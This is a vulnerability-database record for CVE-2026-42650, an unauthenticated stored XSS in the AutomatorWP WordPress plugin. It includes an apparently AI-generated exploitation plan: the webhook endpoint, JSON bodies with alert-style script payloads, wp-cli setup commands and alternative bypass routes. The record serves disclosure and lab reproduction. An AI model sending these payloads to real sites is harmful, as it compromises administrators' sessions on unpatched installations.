[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQYTyRAirTNMlVtdOMoscy9P7lBGdQg_iqNZkyueILa0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-42650","automatorwp-automator-plugin-for-no-code-automations-webhooks-custom-integrations-in-wordpress-unauthenticated-stored-cr","AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress \u003C= 5.6.7 - Unauthenticated Stored Cross-Site Scripting","The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","automatorwp",null,"\u003C=5.6.7","5.6.8","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-29 00:00:00","2026-05-04 13:41:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb06201bd-4f8e-41e5-89e1-b1f47757799b?source=api-prod",6,[22,23,24,25,26,27,28,29],"automatorwp.php","integrations\u002Factivecampaign\u002Fincludes\u002Fajax-functions.php","integrations\u002Factivecampaign\u002Fincludes\u002Frest-api.php","integrations\u002Factivecampaign\u002Fincludes\u002Ftriggers\u002Fuser-added.php","integrations\u002Factivecampaign\u002Fincludes\u002Ftriggers\u002Fuser-tag-added.php","integrations\u002Faweber\u002Fincludes\u002Fajax-functions.php","integrations\u002Fbluesky\u002Fincludes\u002Fajax-functions.php","integrations\u002Fcampaign-monitor\u002Fincludes\u002Fajax-functions.php","researched",false,3,"### 1. Vulnerability Summary\nThe **AutomatorWP** plugin for WordPress (versions \u003C= 5.6.7) is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin's REST API endpoint for the ActiveCampaign integration (`activecampaign\u002Fwebhooks`) fails to sanitize input data before passing it to internal trigger listeners. These listeners then store the raw data as \"Log Meta\" in the database. When a WordPress administrator views the logs in the admin dashboard, the stored scripts are executed in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Factivecampaign\u002Fwebhooks\u002F{slug}`\n*   **Method:** `POST`\n*   **Authentication:** None (The REST route uses `'permission_callback' => '__return_true'`).\n*   **Vulnerable Parameter:** `contact[first_name]`, `contact[last_name]`, or `q`.\n*   **Preconditions:** \n    1. The ActiveCampaign integration must be enabled.\n    2. An Automation must be created and active (status `publish`) using the \"User added to ActiveCampaign\" trigger (`activecampaign_user_added`).\n    3. An existing WordPress user's email must be known (default `admin` email is sufficient).\n\n### 3. Code Flow\n1.  **Entry Point:** `integrations\u002Factivecampaign\u002Fincludes\u002Frest-api.php`: `automatorwp_activecampaign_rest_api_cb()` receives a POST request.\n2.  **Missing Sanitization:** The callback retrieves params via `$data->get_params()`. While it uses `sanitize_text_field` for the `$type` check, it passes the **entire unsanitized `$params` array** to the `do_action` call:\n    `do_action( 'automatorwp_activecampaign_user_subscribed', $params, $user->ID );`\n3.  **Trigger Execution:** `integrations\u002Factivecampaign\u002Fincludes\u002Ftriggers\u002Fuser-added.php`: The `listener()` method receives the unsanitized `$params`.\n4.  **Event Dispatch:** The `listener()` calls `automatorwp_trigger_event()`:\n    ```php\n    automatorwp_trigger_event( array(\n        'trigger'       => $this->trigger,\n        'user_id'       => $user_id,\n        'first_name'    => $params['contact']['first_name'], \u002F\u002F Source: Unsanitized\n        ...\n    ) );\n    ```\n5.  **Storage:** The data is stored in the `wp_automatorwp_log_meta` table (key: `first_name`).\n6.  **Sink:** `integrations\u002Factivecampaign\u002Fincludes\u002Ftriggers\u002Fuser-added.php`: The `log_fields()` method registers `first_name` as a `text` type field. When the admin logs page renders this field, it echoes the stored value without context-aware escaping (e.g., `esc_html`).\n\n### 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe vulnerable endpoint is a REST API route registered in `integrations\u002Factivecampaign\u002Fincludes\u002Frest-api.php`. The registration uses `'permission_callback' => '__return_true'`, allowing unauthenticated access from any source (simulating an external webhook from ActiveCampaign).\n\n### 5. Exploitation Strategy\nThe exploit involves sending a specially crafted JSON payload to the ActiveCampaign webhook REST endpoint.\n\n**Step 1: Determine the Webhook Slug**\nIn a default or unconfigured state, the slug is often an empty string. Attempt the exploit on the base namespace first.\nURL: `\u002Fwp-json\u002Factivecampaign\u002Fwebhooks\u002F`\n\n**Step 2: Send Malicious Webhook Request**\nUse the `http_request` tool to send the POST request.\n\n*   **URL:** `{{BASE_URL}}\u002Fwp-json\u002Factivecampaign\u002Fwebhooks\u002F`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fjson`\n*   **Body:**\n    ```json\n    {\n      \"type\": \"subscribe\",\n      \"contact\": {\n        \"email\": \"admin@example.com\",\n        \"first_name\": \"\u003Cimg src=x onerror=alert('CVE-2026-42650_XSS')>\",\n        \"last_name\": \"Attacker\"\n      },\n      \"date_time\": \"2023-10-27 12:00:00\",\n      \"q\": \"\u002Fvulnerable-path\"\n    }\n    ```\n\n### 6. Test Data Setup\nBefore exploitation, the environment must have an active automation. Run these `wp-cli` commands:\n\n1.  **Get Admin Email:**\n    `wp user get 1 --field=user_email` (Use this in the payload).\n2.  **Create Automation:**\n    ```bash\n    # 1. Create the Automation post\n    AUTO_ID=$(wp post create --post_type=automatorwp_automation --post_title=\"XSS Test\" --post_status=publish --porcelain)\n\n    # 2. Create the Trigger post and link it\n    TRIGGER_ID=$(wp post create --post_type=automatorwp_trigger --post_title=\"AC Trigger\" --post_status=publish --porcelain)\n    wp post term add $TRIGGER_ID automatorwp_trigger_type activecampaign_user_added\n    wp post edit $TRIGGER_ID --post_parent=$AUTO_ID\n\n    # 3. Mark the trigger as activecampaign_user_added in meta\n    wp post meta update $TRIGGER_ID automatorwp_trigger_type activecampaign_user_added\n    ```\n\n### 7. Expected Results\n*   **HTTP Response:** The REST API should return a `200 OK` with `{\"success\":true}`.\n*   **Database Impact:** A new entry will appear in the `wp_automatorwp_log_meta` table with the `meta_key` of `first_name` and the `meta_value` containing the `\u003Cimg ...>` payload.\n*   **XSS Execution:** When an administrator navigates to **AutomatorWP -> Logs**, the JavaScript payload will execute.\n\n### 8. Verification Steps\n1.  **Check Logs Table:**\n    `wp db query \"SELECT * FROM wp_automatorwp_log_meta WHERE meta_key='first_name'\"`\n2.  **Verify Payload Presence:** Ensure the `meta_value` matches the injected string exactly (proving no sanitization occurred during storage).\n3.  **Confirm Execution:** Use `browser_navigate` to `{{BASE_URL}}\u002Fwp-admin\u002Fadmin.php?page=automatorwp_logs` and check for the `alert` or presence of the `img` tag in the DOM.\n\n### 9. Alternative Approaches\nIf the `activecampaign\u002Fwebhooks\u002F` route is not found (404), the plugin may require the slug to be initialized. \n*   **Slug Discovery:** If the browser agent is available, navigate to **AutomatorWP -> Settings -> ActiveCampaign** to see if a slug is generated. If a slug exists (e.g., `abcdefgh`), the endpoint becomes `\u002Fwp-json\u002Factivecampaign\u002Fwebhooks\u002Fabcdefgh`.\n*   **Alternative Parameter:** If `first_name` is filtered by a firewall, try the `q` parameter, which is mapped to `webhook_url` in the listener:\n    ```json\n    {\n      \"type\": \"subscribe\",\n      \"contact\": {\"email\": \"admin@example.com\"},\n      \"q\": \"\\\">\u003Cscript>alert('XSS_IN_Q')\u003C\u002Fscript>\"\n    }\n    ```\n*   **Trigger Variant:** Try the \"Tag added to user\" trigger (`activecampaign_user_tag_added`) via `type: contact_tag_added` in the REST payload.","gemini-3-flash-preview","2026-05-04 17:53:09","2026-05-04 17:53:54",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","5.6.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fautomatorwp\u002Ftags\u002F5.6.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fautomatorwp.5.6.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fautomatorwp\u002Ftags\u002F5.6.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fautomatorwp.5.6.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fautomatorwp\u002Ftags"]